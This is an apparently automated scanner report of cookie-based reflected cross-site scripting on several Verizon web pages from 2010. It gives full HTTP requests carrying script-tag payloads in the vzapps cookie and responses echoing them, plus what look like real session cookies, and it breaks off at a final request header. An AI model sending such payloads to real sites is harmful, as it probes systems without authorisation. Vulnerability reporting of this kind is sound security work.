The value of the VzApps cookie is copied into the HTML document as plain text between tags. The payload 81278<script>alert(1)</script>87264888db4 was submitted in the VzApps cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
The value of the VzApps cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 16bd1'><script>alert(1)</script>1c358468da2 was submitted in the VzApps cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
The value of the vzapps cookie is copied into the HTML document as plain text between tags. The payload 9fca0<script>alert(1)</script>ac910a19ffb was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /Residential/HighSpeedInternet/Value/Value.htm HTTP/1.1 Host: www22.verizon.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Source=CHSI; vzapps=STATE=TX9fca0<script>alert(1)</script>ac910a19ffb; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f345525d5f4f58455e445a4a423660; V347=38J7laQNGQyUQYebWyb8dnlR6FarQ_tWSvDOV9jHkc9v4p6lQXSPuJw; refURL=http://www22.verizon.com/Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.htm?CMP=BAC-MXT_D_P2_CS_Z_Q_N_Z330; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; CP=null*; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASP.NET_SessionId=zj1l4v55cxoz4e55aa3kjqe3; ak-sf=false; CMS_TimeZoneOffset=360;
Response
HTTP/1.0 200 OK Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Content-Type: text/html; charset=utf-8 Content-Length: 74933 Expires: Sat, 20 Nov 2010 00:13:31 GMT Cache-Control: max-age=0, no-cache, no-store Date: Sat, 20 Nov 2010 00:13:31 GMT Connection: close Set-Cookie: ContextInfo_State=TX9fca0<script>alert(1)</script>ac910a19ffb; path=/
<html xmlns:vz> <head id="_ctl0_head"><title> Verizon | High Speed Internet: About High Speed Internet </title><meta name="Keywords" description="reliability, low price, free content, free email ...[SNIP]... <DIV style="FLOAT: left" id=yourlocation>TX9FCA0<SCRIPT>ALERT(1)</SCRIPT>AC910A19FFB </DIV> ...[SNIP]...
The value of the vzapps cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload af68f'><script>alert(1)</script>63ed67becf9 was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /Residential/HighSpeedInternet/Value/Value.htm HTTP/1.1 Host: www22.verizon.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Source=CHSI; vzapps=STATE=TXaf68f'><script>alert(1)</script>63ed67becf9; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f345525d5f4f58455e445a4a423660; V347=38J7laQNGQyUQYebWyb8dnlR6FarQ_tWSvDOV9jHkc9v4p6lQXSPuJw; refURL=http://www22.verizon.com/Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.htm?CMP=BAC-MXT_D_P2_CS_Z_Q_N_Z330; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; CP=null*; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASP.NET_SessionId=zj1l4v55cxoz4e55aa3kjqe3; ak-sf=false; CMS_TimeZoneOffset=360;
Response
HTTP/1.0 200 OK Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Content-Type: text/html; charset=utf-8 Content-Length: 74936 Expires: Sat, 20 Nov 2010 00:13:03 GMT Cache-Control: max-age=0, no-cache, no-store Date: Sat, 20 Nov 2010 00:13:03 GMT Connection: close Set-Cookie: ContextInfo_State=TXaf68f'><script>alert(1)</script>63ed67becf9; path=/
<html xmlns:vz> <head id="_ctl0_head"><title> Verizon | High Speed Internet: About High Speed Internet </title><meta name="Keywords" description="reliability, low price, free content, free email ...[SNIP]... <input type='hidden' id='locationInfo' value='TXAF68F'><SCRIPT>ALERT(1)</SCRIPT>63ED67BECF9 ' /> ...[SNIP]...
The value of the vzapps cookie is copied into the HTML document as plain text between tags. The payload 8b391<script>alert(1)</script>ee2a020046a was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /Residential/HighspeedInternet/FAQ/FAQ.htm HTTP/1.1 Host: www22.verizon.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Source=CHSI; vzapps=STATE=TX8b391<script>alert(1)</script>ee2a020046a; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f345525d5f4f58455e445a4a423660; V347=38J7laQNGQyUQYebWyb8dnlR6FarQ_tWSvDOV9jHkc9v4p6lQXSPuJw; refURL=http://www22.verizon.com/Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.htm?CMP=BAC-MXT_D_P2_CS_Z_Q_N_Z330; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; CP=null*; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASP.NET_SessionId=zj1l4v55cxoz4e55aa3kjqe3; ak-sf=false; CMS_TimeZoneOffset=360;
Response
HTTP/1.0 200 OK Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Content-Type: text/html; charset=utf-8 Content-Length: 104004 Expires: Sat, 20 Nov 2010 00:10:14 GMT Cache-Control: max-age=0, no-cache, no-store Date: Sat, 20 Nov 2010 00:10:14 GMT Connection: close Set-Cookie: ContextInfo_State=TX8b391<script>alert(1)</script>ee2a020046a; path=/
<html xmlns:vz> <head id="_ctl0_head"><title> Verizon | High Speed Internet: FAQs </title><meta name="keywords" content="verizon high speed internet faqs, verizon dsl faqs, verizon faqs, verizon ...[SNIP]... <DIV style="FLOAT: left" id=yourlocation>TX8B391<SCRIPT>ALERT(1)</SCRIPT>EE2A020046A </DIV> ...[SNIP]...
The value of the vzapps cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 4dbaa'><script>alert(1)</script>f9ec6948bd6 was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /Residential/HighspeedInternet/FAQ/FAQ.htm HTTP/1.1 Host: www22.verizon.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Source=CHSI; vzapps=STATE=TX4dbaa'><script>alert(1)</script>f9ec6948bd6; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f345525d5f4f58455e445a4a423660; V347=38J7laQNGQyUQYebWyb8dnlR6FarQ_tWSvDOV9jHkc9v4p6lQXSPuJw; refURL=http://www22.verizon.com/Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.htm?CMP=BAC-MXT_D_P2_CS_Z_Q_N_Z330; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; CP=null*; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASP.NET_SessionId=zj1l4v55cxoz4e55aa3kjqe3; ak-sf=false; CMS_TimeZoneOffset=360;
Response
HTTP/1.0 200 OK Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Content-Type: text/html; charset=utf-8 Content-Length: 104007 Expires: Sat, 20 Nov 2010 00:10:02 GMT Cache-Control: max-age=0, no-cache, no-store Date: Sat, 20 Nov 2010 00:10:02 GMT Connection: close Set-Cookie: ContextInfo_State=TX4dbaa'><script>alert(1)</script>f9ec6948bd6; path=/
The value of the vzapps cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 5be15'><script>alert(1)</script>3c4e8eb8b2a was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /Residential/HomePhone/FiOSDigitalVoice HTTP/1.1 Host: www22.verizon.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Source=CHSI; vzapps=STATE=TX5be15'><script>alert(1)</script>3c4e8eb8b2a; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f345525d5f4f58455e445a4a423660; V347=38J7laQNGQyUQYebWyb8dnlR6FarQ_tWSvDOV9jHkc9v4p6lQXSPuJw; refURL=http://www22.verizon.com/Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.htm?CMP=BAC-MXT_D_P2_CS_Z_Q_N_Z330; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; CP=null*; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASP.NET_SessionId=zj1l4v55cxoz4e55aa3kjqe3; ak-sf=false; CMS_TimeZoneOffset=360;
The value of the vzapps cookie is copied into the HTML document as plain text between tags. The payload 1817e<script>alert(1)</script>dabad9477e was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /Residential/HomePhone/FiOSDigitalVoice HTTP/1.1 Host: www22.verizon.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Source=CHSI; vzapps=STATE=TX1817e<script>alert(1)</script>dabad9477e; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f345525d5f4f58455e445a4a423660; V347=38J7laQNGQyUQYebWyb8dnlR6FarQ_tWSvDOV9jHkc9v4p6lQXSPuJw; refURL=http://www22.verizon.com/Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.htm?CMP=BAC-MXT_D_P2_CS_Z_Q_N_Z330; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; CP=null*; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASP.NET_SessionId=zj1l4v55cxoz4e55aa3kjqe3; ak-sf=false; CMS_TimeZoneOffset=360;
The value of the vzapps cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 8c400'><script>alert(1)</script>5e2533e5388 was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /Residential/HomePhone/FiOSDigitalVoice/ HTTP/1.1 Host: www22.verizon.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Source=CHSI; vzapps=STATE=TX8c400'><script>alert(1)</script>5e2533e5388; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f345525d5f4f58455e445a4a423660; V347=38J7laQNGQyUQYebWyb8dnlR6FarQ_tWSvDOV9jHkc9v4p6lQXSPuJw; refURL=http://www22.verizon.com/Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.htm?CMP=BAC-MXT_D_P2_CS_Z_Q_N_Z330; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; CP=null*; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASP.NET_SessionId=zj1l4v55cxoz4e55aa3kjqe3; ak-sf=false; CMS_TimeZoneOffset=360;
The value of the vzapps cookie is copied into the HTML document as plain text between tags. The payload abbca<script>alert(1)</script>27fec1e0170 was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /Residential/HomePhone/FiOSDigitalVoice/ HTTP/1.1 Host: www22.verizon.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Source=CHSI; vzapps=STATE=TXabbca<script>alert(1)</script>27fec1e0170; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f345525d5f4f58455e445a4a423660; V347=38J7laQNGQyUQYebWyb8dnlR6FarQ_tWSvDOV9jHkc9v4p6lQXSPuJw; refURL=http://www22.verizon.com/Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.htm?CMP=BAC-MXT_D_P2_CS_Z_Q_N_Z330; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; CP=null*; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASP.NET_SessionId=zj1l4v55cxoz4e55aa3kjqe3; ak-sf=false; CMS_TimeZoneOffset=360;
The value of the vzapps cookie is copied into the HTML document as plain text between tags. The payload 33cf3<script>alert(1)</script>f0cf15e82f9 was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /Residential/HomePhone/FiOSDigitalVoice/Features/Features.htm HTTP/1.1 Host: www22.verizon.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Source=CHSI; vzapps=STATE=TX33cf3<script>alert(1)</script>f0cf15e82f9; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f345525d5f4f58455e445a4a423660; V347=38J7laQNGQyUQYebWyb8dnlR6FarQ_tWSvDOV9jHkc9v4p6lQXSPuJw; refURL=http://www22.verizon.com/Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.htm?CMP=BAC-MXT_D_P2_CS_Z_Q_N_Z330; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; CP=null*; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASP.NET_SessionId=zj1l4v55cxoz4e55aa3kjqe3; ak-sf=false; CMS_TimeZoneOffset=360;
The value of the vzapps cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 70270'><script>alert(1)</script>55b92e6b12d was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /Residential/HomePhone/FiOSDigitalVoice/Features/Features.htm HTTP/1.1 Host: www22.verizon.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Source=CHSI; vzapps=STATE=TX70270'><script>alert(1)</script>55b92e6b12d; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f345525d5f4f58455e445a4a423660; V347=38J7laQNGQyUQYebWyb8dnlR6FarQ_tWSvDOV9jHkc9v4p6lQXSPuJw; refURL=http://www22.verizon.com/Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.htm?CMP=BAC-MXT_D_P2_CS_Z_Q_N_Z330; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; CP=null*; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASP.NET_SessionId=zj1l4v55cxoz4e55aa3kjqe3; ak-sf=false; CMS_TimeZoneOffset=360;
The value of the vzapps cookie is copied into the HTML document as plain text between tags. The payload 4a3fe<script>alert(1)</script>8693fabb78c was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /Residential/HomePhone/FiOSDigitalVoice/HowItWorks/HowItWorks.htm HTTP/1.1 Host: www22.verizon.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Source=CHSI; vzapps=STATE=TX4a3fe<script>alert(1)</script>8693fabb78c; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f345525d5f4f58455e445a4a423660; V347=38J7laQNGQyUQYebWyb8dnlR6FarQ_tWSvDOV9jHkc9v4p6lQXSPuJw; refURL=http://www22.verizon.com/Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.htm?CMP=BAC-MXT_D_P2_CS_Z_Q_N_Z330; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; CP=null*; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASP.NET_SessionId=zj1l4v55cxoz4e55aa3kjqe3; ak-sf=false; CMS_TimeZoneOffset=360;
The value of the vzapps cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 2fb11'><script>alert(1)</script>c9082fb4a68 was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /Residential/HomePhone/FiOSDigitalVoice/HowItWorks/HowItWorks.htm HTTP/1.1 Host: www22.verizon.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Source=CHSI; vzapps=STATE=TX2fb11'><script>alert(1)</script>c9082fb4a68; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f345525d5f4f58455e445a4a423660; V347=38J7laQNGQyUQYebWyb8dnlR6FarQ_tWSvDOV9jHkc9v4p6lQXSPuJw; refURL=http://www22.verizon.com/Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.htm?CMP=BAC-MXT_D_P2_CS_Z_Q_N_Z330; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; CP=null*; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASP.NET_SessionId=zj1l4v55cxoz4e55aa3kjqe3; ak-sf=false; CMS_TimeZoneOffset=360;
The value of the vzapps cookie is copied into the HTML document as plain text between tags. The payload a439f<script>alert(1)</script>4e7b1405640 was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /Residential/Internet/ HTTP/1.1 Host: www22.verizon.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Source=CHSI; vzapps=STATE=TXa439f<script>alert(1)</script>4e7b1405640; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f345525d5f4f58455e445a4a423660; V347=38J7laQNGQyUQYebWyb8dnlR6FarQ_tWSvDOV9jHkc9v4p6lQXSPuJw; refURL=http://www22.verizon.com/Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.htm?CMP=BAC-MXT_D_P2_CS_Z_Q_N_Z330; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; CP=null*; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASP.NET_SessionId=zj1l4v55cxoz4e55aa3kjqe3; ak-sf=false; CMS_TimeZoneOffset=360;
Response
HTTP/1.0 200 OK Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Content-Type: text/html; charset=utf-8 Content-Length: 73116 Expires: Sat, 20 Nov 2010 00:11:06 GMT Cache-Control: max-age=0, no-cache, no-store Date: Sat, 20 Nov 2010 00:11:06 GMT Connection: close Set-Cookie: ContextInfo_State=TXa439f<script>alert(1)</script>4e7b1405640; path=/ Set-Cookie: ContextInfo_LoopQual=; path=/
<html xmlns:vz> <head id="_ctl0_head"><title> Verizon | Internet </title><meta name="keywords" content="verizon internet services, verizon internet products, ISP, internet service, fios internet ...[SNIP]... <DIV style="FLOAT: left" id=yourlocation>TXA439F<SCRIPT>ALERT(1)</SCRIPT>4E7B1405640 </DIV> ...[SNIP]...
The value of the vzapps cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 18609'><script>alert(1)</script>38eb9406858 was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /Residential/Internet/ HTTP/1.1 Host: www22.verizon.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Source=CHSI; vzapps=STATE=TX18609'><script>alert(1)</script>38eb9406858; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f345525d5f4f58455e445a4a423660; V347=38J7laQNGQyUQYebWyb8dnlR6FarQ_tWSvDOV9jHkc9v4p6lQXSPuJw; refURL=http://www22.verizon.com/Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.htm?CMP=BAC-MXT_D_P2_CS_Z_Q_N_Z330; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; CP=null*; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASP.NET_SessionId=zj1l4v55cxoz4e55aa3kjqe3; ak-sf=false; CMS_TimeZoneOffset=360;
Response
HTTP/1.0 200 OK Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Content-Type: text/html; charset=utf-8 Content-Length: 73121 Expires: Sat, 20 Nov 2010 00:10:11 GMT Cache-Control: max-age=0, no-cache, no-store Date: Sat, 20 Nov 2010 00:10:11 GMT Connection: close Set-Cookie: ContextInfo_State=TX18609'><script>alert(1)</script>38eb9406858; path=/ Set-Cookie: ContextInfo_LoopQual=; path=/
<html xmlns:vz> <head id="_ctl0_head"><title> Verizon | Internet </title><meta name="keywords" content="verizon internet services, verizon internet products, ISP, internet service, fios internet ...[SNIP]... <input type='hidden' id='locationInfo' value='TX18609'><SCRIPT>ALERT(1)</SCRIPT>38EB9406858 ' /> ...[SNIP]...
The value of the vzapps cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload a33c2'><script>alert(1)</script>e9e9cf39ae6 was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /Residential/Services/ HTTP/1.1 Host: www22.verizon.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Source=CHSI; vzapps=STATE=TXa33c2'><script>alert(1)</script>e9e9cf39ae6; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f345525d5f4f58455e445a4a423660; V347=38J7laQNGQyUQYebWyb8dnlR6FarQ_tWSvDOV9jHkc9v4p6lQXSPuJw; refURL=http://www22.verizon.com/Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.htm?CMP=BAC-MXT_D_P2_CS_Z_Q_N_Z330; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; CP=null*; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASP.NET_SessionId=zj1l4v55cxoz4e55aa3kjqe3; ak-sf=false; CMS_TimeZoneOffset=360;
Response
HTTP/1.0 200 OK Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Content-Type: text/html; charset=utf-8 Content-Length: 55449 Expires: Sat, 20 Nov 2010 00:16:02 GMT Cache-Control: max-age=0, no-cache, no-store Date: Sat, 20 Nov 2010 00:16:02 GMT Connection: close Set-Cookie: ContextInfo_State=TXa33c2'><script>alert(1)</script>e9e9cf39ae6; path=/
The value of the vzapps cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload d2a62'><script>alert(1)</script>712158990f3 was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /Residential/Services/BackupandSharing/BackupandSharing.htm HTTP/1.1 Host: www22.verizon.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Source=CHSI; vzapps=STATE=TXd2a62'><script>alert(1)</script>712158990f3; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f345525d5f4f58455e445a4a423660; V347=38J7laQNGQyUQYebWyb8dnlR6FarQ_tWSvDOV9jHkc9v4p6lQXSPuJw; refURL=http://www22.verizon.com/Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.htm?CMP=BAC-MXT_D_P2_CS_Z_Q_N_Z330; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; CP=null*; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASP.NET_SessionId=zj1l4v55cxoz4e55aa3kjqe3; ak-sf=false; CMS_TimeZoneOffset=360;
Response
HTTP/1.0 200 OK Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Content-Type: text/html; charset=utf-8 Content-Length: 60755 Expires: Sat, 20 Nov 2010 00:16:09 GMT Cache-Control: max-age=0, no-cache, no-store Date: Sat, 20 Nov 2010 00:16:09 GMT Connection: close Set-Cookie: ContextInfo_State=TXd2a62'><script>alert(1)</script>712158990f3; path=/
<html xmlns:vz> <head id="_ctl0_head"><title> Verizon | Essential Services: Backup and Sharing </title><meta name="keywords" content="back up pc, backup pc, pc backup, back up Mac, back up Macin ...[SNIP]... <input type='hidden' id='locationInfo' value='TXD2A62'><SCRIPT>ALERT(1)</SCRIPT>712158990F3 ' /> ...[SNIP]...
The value of the vzapps cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 7daef'><script>alert(1)</script>c934f3f7b2c was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
